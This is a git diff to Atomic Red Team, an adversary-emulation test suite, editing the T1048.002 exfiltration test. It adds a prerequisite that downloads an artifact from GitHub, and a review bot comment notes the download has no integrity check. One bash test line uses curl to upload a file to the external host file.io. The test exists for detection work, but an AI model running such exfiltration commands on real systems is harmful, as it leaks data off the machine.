diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b984fc57..590bbb22 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -101642,6 +101642,13 @@ exfiltration:
 Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
 Remove-Item $env:temp\curl
 Remove-Item $env:temp\curl.zip
+ - description: "#{input_file} must be exist on system.\n"
+ prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "#{input_file}"
 executor:
 name: command_prompt
 elevation_required: false
@@ -101663,8 +101670,10 @@ exfiltration:
 executor:
 name: bash
 elevation_required: false
- command: curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true'
+ command: 'curl -F ''file=@#{input_file}'' -F ''maxDownloads=1'' -F ''autoDelete=true''
 https://file.io/
+
+ '
 T1041:
 technique:
 x_mitre_platforms:
diff --git a/atomics/T1048.002/T1048.002.md b/atomics/T1048.002/T1048.002.md
index 61680bcf..3c7cef5b 100644
--- a/atomics/T1048.002/T1048.002.md
+++ b/atomics/T1048.002/T1048.002.md
@@ -58,6 +58,16 @@ Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System3
 Remove-Item $env:temp\curl
 Remove-Item $env:temp\curl.zip
 ```
+##### Description: #{input_file} must be exist on system. ##### Check Prereq Commands: ```powershell if (Test-Path #{input_file}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "#{input_file}" ```
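Review bot: The new get_prereq_command in the first index.yaml hunk fetches the artifact from the mutable `master` ref with Invoke-WebRequest and writes it straight to `#{input_file}` with no integrity check, so the bytes the test later exfiltrates can change silently and an edited or compromised upstream copy would be accepted as-is; pin the URL to a commit SHA, or verify a known SHA-256 with `Get-FileHash` before accepting the download, so the prerequisite is reproducible. The new description string has a grammar slip — `description: "#{input_file} must exist on the system.\n"` reads correctly. The atomic's executor in the trailing context is `command_prompt` while both new prereq commands are PowerShell (`Test-Path`, `Invoke-WebRequest`); the rendered markdown fences them as powershell, so a `dependency_executor_name: powershell` presumably exists above the hunk — worth confirming, since otherwise the checks would run under cmd.exe and fail. The enclosing dependency list and atomic definition start outside the hunk.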